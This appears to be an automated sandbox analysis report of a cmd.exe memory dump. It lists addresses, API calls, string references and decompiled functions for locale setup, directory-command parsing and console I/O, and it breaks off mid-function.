0x00da361a
0x00da361e
0x00da365a
0x00da365a
0x00da3620
0x00da3626
0x00da3634
0x00da3639
0x00da3641
0x00da364e
0x00da364e
0x00da3654
0x00da3656
0x00da3656
0x00da3661
0x00000000
0x00000000
0x00da3667
0x00da366a
0x00da366f
0x00da3676
0x00000000
0x00da3678
0x00da3678
0x00da3678
0x00da367f
0x00000000
0x00000000
0x00da3681
0x00da3688
0x00da36c8
0x00000000
0x00da368a
0x00da368a
0x00da3691
0x00da36ba
0x00da36be
0x00da36d4
0x00da36d4
0x00da36d7
0x00000000
0x00da36d9
0x00da36d9
0x00da36d9
0x00da36dc
0x00000000
0x00da36de
0x00da36e2
0x00da36e6
0x00da36ea
0x00da36ec
0x00da3729
0x00da3729
0x00da36ee
0x00da36ee
0x00da36f0
0x00da36f2
0x00da36f2
0x00da36f5
0x00da36f8
0x00000000
0x00000000
0x00da36fa
0x00da36fd
0x00da3714
0x00da3714
0x00da3716
0x00da36ff
0x00da36ff
0x00da3703
0x00da3707
0x00000000
0x00da3709
0x00da3709
0x00da370c
0x00da370f
0x00da3712
0x00000000
0x00000000
0x00000000
0x00000000
0x00da3712
0x00da3707
0x00da3721
0x00da3721
0x00da3725
0x00da3727
0x00000000
0x00000000
0x00000000
0x00da3727
0x00da371a
0x00da371c
0x00da371f
0x00da371f
0x00000000
0x00da371f
0x00da3731
0x00da3731
0x00da3735
0x00da3737
0x00da373d
0x00da3742
0x00da3750
0x00da3756
0x00da3759
0x00da375b
0x00da37db
0x00da37dd
0x00da375d
0x00da3765
0x00da376b
0x00da376e
0x00da3770
0x00000000
0x00da3772
0x00da377a
0x00da3780
0x00da3783
0x00da3785
0x00000000
0x00da3787
0x00da378f
0x00da3795
0x00da3798
0x00da379a
0x00000000
0x00da379c
0x00da37a4
0x00da37aa
0x00da37ad
0x00da37af
0x00000000
0x00da37b1
0x00da37b9
0x00da37bf
0x00da37c2
0x00da37c4
0x00000000
0x00da37c6
0x00da37ce
0x00da37d4
0x00da37d7
0x00da37d9
0x00da37e0
0x00000000
0x00000000
0x00000000
0x00da37d9
0x00da37c4
0x00da37af
0x00da379a
0x00da3785
0x00da3770
0x00da375b
0x00da3742
0x00da37e4
0x00da37eb
0x00da37ed
0x00da37fa
0x00da37fb
0x00da37ff
0x00da3804
0x00da3806
0x00da38a7
0x00da38ac
0x00da38ae
0x00da38b2
0x00da38b2
0x00da38b8
0x00da38ba
0x00da38ba
0x00da38bd
0x00da38bd
0x00da38c0
0x00da38c3
0x00da38c3
0x00da38ca
0x00da38ca
0x00da38ce
0x00da380c
0x00da380c
0x00da381a
0x00da3820
0x00da3822
0x00da383b
0x00da383b
0x00da383d
0x00da3842
0x00da3842
0x00da3846
0x00da3848
0x00da3848
0x00da384b
0x00da384b
0x00da384e
0x00da3851
0x00da3851
0x00da3861
0x00da3865
0x00da386f
0x00da3870
0x00da3871
0x00da3875
0x00da3877
0x00da387b
0x00da3892
0x00da389c
0x00da38a0
0x00da38a0
0x00da38d2
0x00da38d4
0x00da38e9
0x00da38e9
0x00da38d6
0x00da38d7
0x00da38e1
0x00da38e1
0x00da38eb
0x00da38ed
0x00da38ed
0x00da38f0
0x00da38f0
0x00da38f3
0x00da38f6
0x00da38f6
0x00da38ff
0x00da38ff
0x00da3902
0x00da3917
0x00da3919
0x00da391b
0x00da392e
0x00da391d
0x00da391d
0x00da3924
0x00000000
0x00da3924
0x00da391b
0x00da36dc
0x00da3693
0x00da3697
0x00da369a
0x00000000
0x00000000
0x00000000
0x00000000
0x00da369a
0x00da3691
0x00000000
0x00da3688
0x00da36ce
0x00da36d0
0x00000000
0x00da36d0
0x00000000
0x00da3676
0x00da369c
0x00da369e
0x00da36ab
0x00da36ab
0x00da36b1
0x00da36b1
0x00da356e
0x00da3561
0x00da395a
0x00da395e
0x00da395f
0x00da3960
0x00da396b

APIs

GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,0000000A,00000000,00000001), ref: 00DA352E
_get_osfhandle.MSVCRT ref: 00DA353F
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 00DA357A
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DC7F20), ref: 00DA35E1
ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000010), ref: 00DA35F8
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DC7F20), ref: 00DA3607
EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00DA3626
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00DA3639
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00DA3647
RtlFreeHeap.NTDLL(00000000), ref: 00DA364E
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00DA36A4
RtlFreeHeap.NTDLL(00000000), ref: 00DA36AB
_wcsnicmp.MSVCRT ref: 00DA3750
_wcsnicmp.MSVCRT ref: 00DA3765
_wcsnicmp.MSVCRT ref: 00DA377A
_wcsnicmp.MSVCRT ref: 00DA378F
_wcsnicmp.MSVCRT ref: 00DA37A4
_wcsnicmp.MSVCRT ref: 00DA37B9
_wcsnicmp.MSVCRT ref: 00DA37CE
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,00000001,?), ref: 00DA381A
SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 00DA3865
FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00000020,?,?,?), ref: 00DA387B
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000000), ref: 00DA3892
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00DA38DA
RtlFreeHeap.NTDLL(00000000), ref: 00DA38E1
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000009,?,?,?,00000001), ref: 00DA390A
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00DA3911
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DC7F20), ref: 00DA3938
ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000000), ref: 00DA3949
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DC7F20), ref: 00DA3952

Strings

md , xrefs: 00DA3774
rd , xrefs: 00DA375F
pushd , xrefs: 00DA37C8
chdir , xrefs: 00DA3789
cd , xrefs: 00DA374A
rmdir , xrefs: 00DA379E
mkdir , xrefs: 00DA37B3

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferCriticalInfoReadReleaseScreenSection$AllocCharacterCursorEnterFillHandleLeaveOutputPositionWrite_get_osfhandle
String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
API String ID: 2991647268-3100821235
Opcode ID: ce991f42cb71a1c9ab1bc2990b1a3269578d16293ba9a266c62c7e9c9b807555
Instruction ID: cf4aae6b4b5fca39f1d3e5c261839caf8dd5726358872c0ceb8ec256b8e70164
Opcode Fuzzy Hash: ce991f42cb71a1c9ab1bc2990b1a3269578d16293ba9a266c62c7e9c9b807555
Instruction Fuzzy Hash: 12C1C5B1604302AFD7109F64DC99A6BBBE6FF8A710F08491DF996C22A0D775CA45CB31

Uniqueness

Uniqueness Score: -1.00%

Function 00D93F80, Relevance: 47.6, APIs: 15, Strings: 12, Instructions: 395
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00D93F80() {
				signed int _v8;
				short _v264;
				void* __edi;
				void* __esi;
				signed int _t33;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				intOrPtr _t86;
				void* _t87;
				signed int _t89;
				signed int _t90;
				signed int _t91;
				void* _t92;
				short* _t93;
				short* _t94;
				short* _t95;
				short* _t96;
				short* _t97;
				short* _t98;
				short* _t99;
				short* _t100;
				short* _t101;
				short* _t102;
				short* _t103;
				intOrPtr* _t106;
				int _t107;
				int _t108;
				int _t109;
				int _t110;
				int _t111;
				int _t112;
				int _t113;
				int _t114;
				int _t115;
				int _t116;
				void* _t118;
				void* _t120;
				void* _t122;
				void* _t124;
				void* _t126;
				void* _t128;
				void* _t130;
				void* _t132;
				void* _t134;
				int _t136;
				signed int _t138;

				_t33 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t33 ^ _t138;
				_t136 = E00D941A4();
				if(GetLocaleInfoW(_t136, 0x1e, 0xdaf81c, 8) == 0) {
					_t93 = 0xdaf81c;
					_t107 = 8;
					_t118 = ":" - 0xdaf81c;
					while(1) {
						_t11 = _t107 + 0x7ffffff6; // 0x7ffffffe
						if(_t11 == 0) {
							break;
						}
						_t91 =  *(_t118 + _t93) & 0x0000ffff;
						if(_t91 == 0) {
							break;
						}
						 *_t93 = _t91;
						_t93 =  &(_t93[1]);
						_t107 = _t107 - 1;
						if(_t107 != 0) {
							continue;
						}
						L33:
						_t93 = _t93 - 2;
						L34:
						 *_t93 = 0;
						goto L1;
					}
					if(_t107 != 0) {
						goto L34;
					}
					goto L33;
				}
				L1:
				if(GetLocaleInfoW(_t136, 0x23,  &_v264, 0x80) == 0) {
					L9:
					 *0xdad540 = 0;
					if(GetLocaleInfoW(_t136, 0x21,  &_v264, 0x80) != 0) {
						_t86 = (_v264 & 0x0000ffff) - 0x30;
						if(_t86 != 0) {
							_t87 = _t86 - 1;
							if(_t87 == 0) {
								 *0xdad540 = 1;
								 *0xdaf7f8 = L"dd/MM/yy";
							} else {
								if(_t87 == 1) {
									 *0xdad540 = 2;
									 *0xdaf7f8 = L"yy/MM/dd";
								}
							}
						} else {
							 *0xdad540 = _t86;
							 *0xdaf7f8 = L"MM/dd/yy";
						}
					}
					 *0xdaf620 = 2;
					if(GetLocaleInfoW(_t136, 0x24,  &_v264, 0x80) != 0 && _v264 == 0x31) {
						 *0xdaf620 = 4;
					}
					if(GetLocaleInfoW(_t136, 0x1d, 0xdaf80c, 8) == 0) {
						_t94 = 0xdaf80c;
						_t108 = 8;
						_t120 = "/" - 0xdaf80c;
						while(1) {
							_t13 = _t108 + 0x7ffffff6; // 0x7ffffffe
							if(_t13 == 0) {
								break;
							}
							_t84 =  *(_t120 + _t94) & 0x0000ffff;
							if(_t84 == 0) {
								break;
							}
							 *_t94 = _t84;
							_t94 =  &(_t94[1]);
							_t108 = _t108 - 1;
							if(_t108 != 0) {
								continue;
							}
							L45:
							_t94 = _t94 - 2;
							L46:
							 *_t94 = 0;
							goto L16;
						}
						if(_t108 != 0) {
							goto L46;
						}
						goto L45;
					} else {
						L16:
						if(GetLocaleInfoW(_t136, 0x31, 0xdaf7a8, 0x20) == 0) {
							_t95 = 0xdaf7a8;
							_t109 = 0x20;
							_t122 = L"Mon" - 0xdaf7a8;
							while(1) {
								_t15 = _t109 + 0x7fffffde; // 0x7ffffffe
								if(_t15 == 0) {
									break;
								}
								_t83 =  *(_t122 + _t95) & 0x0000ffff;
								if(_t83 == 0) {
									break;
								}
								 *_t95 = _t83;
								_t95 =  &(_t95[1]);
								_t109 = _t109 - 1;
								if(_t109 != 0) {
									continue;
								}
								L53:
								_t95 = _t95 - 2;
								L54:
								 *_t95 = 0;
								goto L17;
							}
							if(_t109 != 0) {
								goto L54;
							}
							goto L53;
						}
						L17:
						if(GetLocaleInfoW(_t136, 0x32, 0xdaf768, 0x20) == 0) {
							_t96 = 0xdaf768;
							_t110 = 0x20;
							_t124 = L"Tue" - 0xdaf768;
							while(1) {
								_t17 = _t110 + 0x7fffffde; // 0x7ffffffe
								if(_t17 == 0) {
									break;
								}
								_t82 =  *(_t124 + _t96) & 0x0000ffff;
								if(_t82 == 0) {
									break;
								}
								 *_t96 = _t82;
								_t96 =  &(_t96[1]);
								_t110 = _t110 - 1;
								if(_t110 != 0) {
									continue;
								}
								L61:
								_t96 = _t96 - 2;
								L62:
								 *_t96 = 0;
								goto L18;
							}
							if(_t110 != 0) {
								goto L62;
							}
							goto L61;
						}
						L18:
						if(GetLocaleInfoW(_t136, 0x33, 0xdaf728, 0x20) == 0) {
							_t97 = 0xdaf728;
							_t111 = 0x20;
							_t126 = L"Wed" - 0xdaf728;
							while(1) {
								_t19 = _t111 + 0x7fffffde; // 0x7ffffffe
								if(_t19 == 0) {
									break;
								}
								_t81 =  *(_t126 + _t97) & 0x0000ffff;
								if(_t81 == 0) {
									break;
								}
								 *_t97 = _t81;
								_t97 =  &(_t97[1]);
								_t111 = _t111 - 1;
								if(_t111 != 0) {
									continue;
								}
								L69:
								_t97 = _t97 - 2;
								L70:
								 *_t97 = 0;
								goto L19;
							}
							if(_t111 != 0) {
								goto L70;
							}
							goto L69;
						}
						L19:
						if(GetLocaleInfoW(_t136, 0x34, 0xdaf6e8, 0x20) == 0) {
							_t98 = 0xdaf6e8;
							_t112 = 0x20;
							_t128 = L"Thu" - 0xdaf6e8;
							while(1) {
								_t21 = _t112 + 0x7fffffde; // 0x7ffffffe
								if(_t21 == 0) {
									break;
								}
								_t80 =  *(_t128 + _t98) & 0x0000ffff;
								if(_t80 == 0) {
									break;
								}
								 *_t98 = _t80;
								_t98 =  &(_t98[1]);
								_t112 = _t112 - 1;
								if(_t112 != 0) {
									continue;
								}
								L77:
								_t98 = _t98 - 2;
								L78:
								 *_t98 = 0;
								goto L20;
							}
							if(_t112 != 0) {
								goto L78;
							}
							goto L77;
						}
						L20:
						if(GetLocaleInfoW(_t136, 0x35, 0xdaf6a8, 0x20) == 0) {
							_t99 = 0xdaf6a8;
							_t113 = 0x20;
							_t130 = L"Fri" - 0xdaf6a8;
							while(1) {
								_t23 = _t113 + 0x7fffffde; // 0x7ffffffe
								if(_t23 == 0) {
									break;
								}
								_t79 =  *(_t130 + _t99) & 0x0000ffff;
								if(_t79 == 0) {
									break;
								}
								 *_t99 = _t79;
								_t99 =  &(_t99[1]);
								_t113 = _t113 - 1;
								if(_t113 != 0) {
									continue;
								}
								L85:
								_t99 = _t99 - 2;
								L86:
								 *_t99 = 0;
								goto L21;
							}
							if(_t113 != 0) {
								goto L86;
							}
							goto L85;
						}
						L21:
						if(GetLocaleInfoW(_t136, 0x36, 0xdaf668, 0x20) == 0) {
							_t100 = 0xdaf668;
							_t114 = 0x20;
							_t132 = L"Sat" - 0xdaf668;
							while(1) {
								_t25 = _t114 + 0x7fffffde; // 0x7ffffffe
								if(_t25 == 0) {
									break;
								}
								_t78 =  *(_t132 + _t100) & 0x0000ffff;
								if(_t78 == 0) {
									break;
								}
								 *_t100 = _t78;
								_t100 =  &(_t100[1]);
								_t114 = _t114 - 1;
								if(_t114 != 0) {
									continue;
								}
								L93:
								_t100 = _t100 - 2;
								L94:
								 *_t100 = 0;
								goto L22;
							}
							if(_t114 != 0) {
								goto L94;
							}
							goto L93;
						}
						L22:
						if(GetLocaleInfoW(_t136, 0x37, 0xdaf628, 0x20) == 0) {
							_t101 = 0xdaf628;
							_t115 = 0x20;
							_t134 = L"Sun" - 0xdaf628;
							while(1) {
								_t27 = _t115 + 0x7fffffde; // 0x7ffffffe
								if(_t27 == 0) {
									break;
								}
								_t77 =  *(_t134 + _t101) & 0x0000ffff;
								if(_t77 == 0) {
									break;
								}
								 *_t101 = _t77;
								_t101 =  &(_t101[1]);
								_t115 = _t115 - 1;
								if(_t115 != 0) {
									continue;
								}
								L101:
								_t101 = _t101 - 2;
								L102:
								 *_t101 = 0;
								goto L23;
							}
							if(_t115 != 0) {
								goto L102;
							}
							goto L101;
						}
						L23:
						if(GetLocaleInfoW(_t136, 0xe, 0xdaf7fc, 8) == 0) {
							_t102 = 0xdaf7fc;
							_t116 = 8;
							_t134 = "." - 0xdaf7fc;
							while(1) {
								_t29 = _t116 + 0x7ffffff6; // 0x7ffffffe
								if(_t29 == 0) {
									break;
								}
								_t76 =  *(_t134 + _t102) & 0x0000ffff;
								if(_t76 == 0) {
									break;
								}
								 *_t102 = _t76;
								_t102 =  &(_t102[1]);
								_t116 = _t116 - 1;
								if(_t116 != 0) {
									continue;
								}
								L109:
								_t102 = _t102 - 2;
								L110:
								 *_t102 = 0;
								goto L24;
							}
							if(_t116 != 0) {
								goto L110;
							}
							goto L109;
						}
						L24:
						if(GetLocaleInfoW(_t136, 0xf, 0xdaf7e8, 8) == 0) {
							_t103 = 0xdaf7e8;
							_t116 = 8;
							_t136 = "," - 0xdaf7e8;
							while(1) {
								_t31 = _t116 + 0x7ffffff6; // 0x7ffffffe
								if(_t31 == 0) {
									break;
								}
								_t75 =  *(_t103 + _t136) & 0x0000ffff;
								if(_t75 == 0) {
									break;
								}
								 *_t103 = _t75;
								_t103 =  &(_t103[1]);
								_t116 = _t116 - 1;
								if(_t116 != 0) {
									continue;
								}
								L117:
								_t103 = _t103 - 2;
								L118:
								 *_t103 = 0;
								goto L25;
							}
							if(_t116 != 0) {
								goto L118;
							}
							goto L117;
						}
						L25:
						__imp__setlocale(".OCP");
						return E00D96FD0(0, _t92, _v8 ^ _t138, _t116, _t134, _t136, 0);
					}
				} else {
					_t89 = "1";
					_t106 =  &_v264;
					while(1) {
						_t116 =  *_t106;
						if(_t116 !=  *_t89) {
							break;
						}
						if(_t116 == 0) {
							L7:
							_t90 = 0;
							L8:
							 *0xdad0cc = _t90;
							goto L9;
						}
						_t116 =  *((intOrPtr*)(_t106 + 2));
						_t5 = _t89 + 2; // 0x410000
						if(_t116 !=  *_t5) {
							break;
						}
						_t106 = _t106 + 4;
						_t89 = _t89 + 4;
						if(_t116 != 0) {
							continue;
						}
						goto L7;
					}
					asm("sbb eax, eax");
					_t90 = _t89 | 0x00000001;
					goto L8;
				}
			}

0x00d93f8b
0x00d93f92
0x00d93fa3
0x00d93fb0
0x00d9e1fa
0x00d9e204
0x00d9e209
0x00d9e20b
0x00d9e20b
0x00d9e213
0x00000000
0x00000000
0x00d9e215
0x00d9e21c
0x00000000
0x00000000
0x00d9e21e
0x00d9e221
0x00d9e224
0x00d9e227
0x00000000
0x00000000
0x00d9e22f
0x00d9e22f
0x00d9e232
0x00d9e234
0x00000000
0x00d9e234
0x00d9e22d
0x00000000
0x00000000
0x00000000
0x00d9e22d
0x00d93fb6
0x00d93fcd
0x00d94011
0x00d9401c
0x00d94032
0x00d9403b
0x00d9403e
0x00d9e23c
0x00d9e23f
0x00d9e263
0x00d9e26d
0x00d9e241
0x00d9e244
0x00d9e24a
0x00d9e254
0x00d9e254
0x00d9e244
0x00d94044
0x00d94044
0x00d94049
0x00d94049
0x00d9403e
0x00d9405e
0x00d94074
0x00d94080
0x00d94080
0x00d9409c
0x00d9e27c
0x00d9e286
0x00d9e28b
0x00d9e28d
0x00d9e28d
0x00d9e295
0x00000000
0x00000000
0x00d9e297
0x00d9e29e
0x00000000
0x00000000
0x00d9e2a0
0x00d9e2a3
0x00d9e2a6
0x00d9e2a9
0x00000000
0x00000000
0x00d9e2b1
0x00d9e2b1
0x00d9e2b4
0x00d9e2b6
0x00000000
0x00d9e2b6
0x00d9e2af
0x00000000
0x00000000
0x00000000
0x00d940a2
0x00d940a2
0x00d940b4
0x00d9e2be
0x00d9e2c8
0x00d9e2cd
0x00d9e2cf
0x00d9e2cf
0x00d9e2d7
0x00000000
0x00000000
0x00d9e2d9
0x00d9e2e0
0x00000000
0x00000000
0x00d9e2e2
0x00d9e2e5
0x00d9e2e8
0x00d9e2eb
0x00000000
0x00000000
0x00d9e2f3
0x00d9e2f3
0x00d9e2f6
0x00d9e2f8
0x00000000
0x00d9e2f8
0x00d9e2f1
0x00000000
0x00000000
0x00000000
0x00d9e2f1
0x00d940ba
0x00d940cc
0x00d9e300
0x00d9e30a
0x00d9e30f
0x00d9e311
0x00d9e311
0x00d9e319
0x00000000
0x00000000
0x00d9e31b
0x00d9e322
0x00000000
0x00000000
0x00d9e324
0x00d9e327
0x00d9e32a
0x00d9e32d
0x00000000
0x00000000
0x00d9e335
0x00d9e335
0x00d9e338
0x00d9e33a
0x00000000
0x00d9e33a
0x00d9e333
0x00000000
0x00000000
0x00000000
0x00d9e333
0x00d940d2
0x00d940e4
0x00d9e342
0x00d9e34c
0x00d9e351
0x00d9e353
0x00d9e353
0x00d9e35b
0x00000000
0x00000000
0x00d9e35d
0x00d9e364
0x00000000
0x00000000
0x00d9e366
0x00d9e369
0x00d9e36c
0x00d9e36f
0x00000000
0x00000000
0x00d9e377
0x00d9e377
0x00d9e37a
0x00d9e37c
0x00000000
0x00d9e37c
0x00d9e375
0x00000000
0x00000000
0x00000000
0x00d9e375
0x00d940ea
0x00d940fc
0x00d9e384
0x00d9e38e
0x00d9e393
0x00d9e395
0x00d9e395
0x00d9e39d
0x00000000
0x00000000
0x00d9e39f
0x00d9e3a6
0x00000000
0x00000000
0x00d9e3a8
0x00d9e3ab
0x00d9e3ae
0x00d9e3b1
0x00000000
0x00000000
0x00d9e3b9
0x00d9e3b9
0x00d9e3bc
0x00d9e3be
0x00000000
0x00d9e3be
0x00d9e3b7
0x00000000
0x00000000
0x00000000
0x00d9e3b7
0x00d94102
0x00d94114
0x00d9e3c6
0x00d9e3d0
0x00d9e3d5
0x00d9e3d7
0x00d9e3d7
0x00d9e3df
0x00000000
0x00000000
0x00d9e3e1
0x00d9e3e8
0x00000000
0x00000000
0x00d9e3ea
0x00d9e3ed
0x00d9e3f0
0x00d9e3f3
0x00000000
0x00000000
0x00d9e3fb
0x00d9e3fb
0x00d9e3fe
0x00d9e400
0x00000000
0x00d9e400
0x00d9e3f9
0x00000000
0x00000000
0x00000000
0x00d9e3f9
0x00d9411a
0x00d9412c
0x00d9e408
0x00d9e412
0x00d9e417
0x00d9e419
0x00d9e419
0x00d9e421
0x00000000
0x00000000
0x00d9e423
0x00d9e42a
0x00000000
0x00000000
0x00d9e42c
0x00d9e42f
0x00d9e432
0x00d9e435
0x00000000
0x00000000
0x00d9e43d
0x00d9e43d
0x00d9e440
0x00d9e442
0x00000000
0x00d9e442
0x00d9e43b
0x00000000
0x00000000
0x00000000
0x00d9e43b
0x00d94132
0x00d94144
0x00d9e44a
0x00d9e454
0x00d9e459
0x00d9e45b
0x00d9e45b
0x00d9e463
0x00000000
0x00000000
0x00d9e465
0x00d9e46c
0x00000000
0x00000000
0x00d9e46e
0x00d9e471
0x00d9e474
0x00d9e477
0x00000000
0x00000000
0x00d9e47f
0x00d9e47f
0x00d9e482
0x00d9e484
0x00000000
0x00d9e484
0x00d9e47d
0x00000000
0x00000000
0x00000000
0x00d9e47d
0x00d9414a
0x00d9415c
0x00d9e48c
0x00d9e496
0x00d9e49b
0x00d9e49d
0x00d9e49d
0x00d9e4a5
0x00000000
0x00000000
0x00d9e4a7
0x00d9e4ae
0x00000000
0x00000000
0x00d9e4b0
0x00d9e4b3
0x00d9e4b6
0x00d9e4b9
0x00000000
0x00000000
0x00d9e4c1
0x00d9e4c1
0x00d9e4c4
0x00d9e4c6
0x00000000
0x00d9e4c6
0x00d9e4bf
0x00000000
0x00000000
0x00000000
0x00d9e4bf
0x00d94162
0x00d94174
0x00d9e4ce
0x00d9e4d8
0x00d9e4dd
0x00d9e4df
0x00d9e4df
0x00d9e4e7
0x00000000
0x00000000
0x00d9e4e9
0x00d9e4f0
0x00000000
0x00000000
0x00d9e4f2
0x00d9e4f5
0x00d9e4f8
0x00d9e4fb
0x00000000
0x00000000
0x00d9e503
0x00d9e503
0x00d9e506
0x00d9e508
0x00000000
0x00d9e508
0x00d9e501
0x00000000
0x00000000
0x00000000
0x00d9e501
0x00d9417a
0x00d94181
0x00d94199
0x00d94199
0x00d93fcf
0x00d93fcf
0x00d93fd4
0x00d93fe0
0x00d93fe0
0x00d93fe6
0x00000000
0x00000000
0x00d93fef
0x00d9400a
0x00d9400a
0x00d9400c
0x00d9400c
0x00000000
0x00d9400c
0x00d93ff1
0x00d93ff5
0x00d93ff9
0x00000000
0x00000000
0x00d93fff
0x00d94002
0x00d94008
0x00000000
0x00000000
0x00000000
0x00d94008
0x00d9419a
0x00d9419c
0x00000000
0x00d9419c

APIs

Part of subcall function 00D941A4: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00D85BA1,0000001F,?,00000080), ref: 00D941A4

GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001E,00DAF81C,00000008,00000000,?), ref: 00D93FA8
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 00D93FC5
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 00D9402A
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 00D9406C
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,00DAF80C,00000008), ref: 00D94094
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,00DAF7A8,00000020), ref: 00D940AC
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,00DAF768,00000020), ref: 00D940C4
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000033,00DAF728,00000020), ref: 00D940DC
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000034,00DAF6E8,00000020), ref: 00D940F4
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000035,00DAF6A8,00000020), ref: 00D9410C
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000036,00DAF668,00000020), ref: 00D94124
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000037,00DAF628,00000020), ref: 00D9413C
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000E,00DAF7FC,00000008), ref: 00D94154
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000F,00DAF7E8,00000008), ref: 00D9416C
setlocale.MSVCRT ref: 00D94181

Strings

Tue, xrefs: 00D9E305
yy/MM/dd, xrefs: 00D9E254
.OCP, xrefs: 00D9417A
Fri, xrefs: 00D9E3CB
Thu, xrefs: 00D9E389
Sat, xrefs: 00D9E40D
dd/MM/yy, xrefs: 00D9E26D
Mon, xrefs: 00D9E2C3
1, xrefs: 00D94076
MM/dd/yy, xrefs: 00D94049
Wed, xrefs: 00D9E347
Sun, xrefs: 00D9E44F

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: InfoLocale$DefaultUsersetlocale
String ID: .OCP$1$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
API String ID: 1351325837-478706884
Opcode ID: 62004a7e988176318ae892d241b4a79940db27e9b05ef8ac19ca3f4f0143d6f3
Instruction ID: d040634e5bb2b5108b08a2ea56575c1f2a100c55202dd744a44f8c4cf22f885f
Opcode Fuzzy Hash: 62004a7e988176318ae892d241b4a79940db27e9b05ef8ac19ca3f4f0143d6f3
Instruction Fuzzy Hash: 4CD1BD756003129AEF209F34CD09B7633AAFF52740F1C8269D646DB6D5EB61CA06C375

Uniqueness

Uniqueness Score: -1.00%

Function 00D9374E, Relevance: 42.3, APIs: 15, Strings: 9, Instructions: 322
threadprocessstringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00D9374E(void* __ebx, intOrPtr __ecx, WCHAR* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t68;
				void* _t74;
				intOrPtr _t84;
				intOrPtr _t90;
				WCHAR* _t92;
				WCHAR* _t94;
				WCHAR* _t95;
				int _t98;
				long _t99;
				signed int _t101;
				void* _t104;
				struct _SECURITY_ATTRIBUTES* _t109;
				void* _t117;
				WCHAR* _t122;
				WCHAR* _t129;
				WCHAR* _t135;
				void* _t147;
				signed int _t154;
				WCHAR* _t163;
				void* _t165;
				signed int _t167;
				void* _t169;
				WCHAR* _t174;
				struct _SECURITY_ATTRIBUTES* _t177;
				void* _t178;

				E00D975CC(__ebx, __edi, __esi);
				 *(_t178 - 0xa8) = __edx;
				 *((intOrPtr*)(_t178 - 0xbc)) = __ecx;
				_t174 =  *(_t178 + 0xc);
				_t135 =  *(_t178 + 0x10);
				_t177 = 0;
				 *(_t178 - 0xac) = 0;
				 *(_t178 - 0xa4) = 0;
				 *((intOrPtr*)(_t178 - 0xb0)) = 0;
				 *((intOrPtr*)(_t178 - 0xb4)) = 0x20;
				_t68 = _t178 - 0xa0;
				__imp__InitializeProcThreadAttributeList(_t68, 1, 0, _t178 - 0xb4, 0xdabdf8, 0x108);
				if(_t68 == 0) {
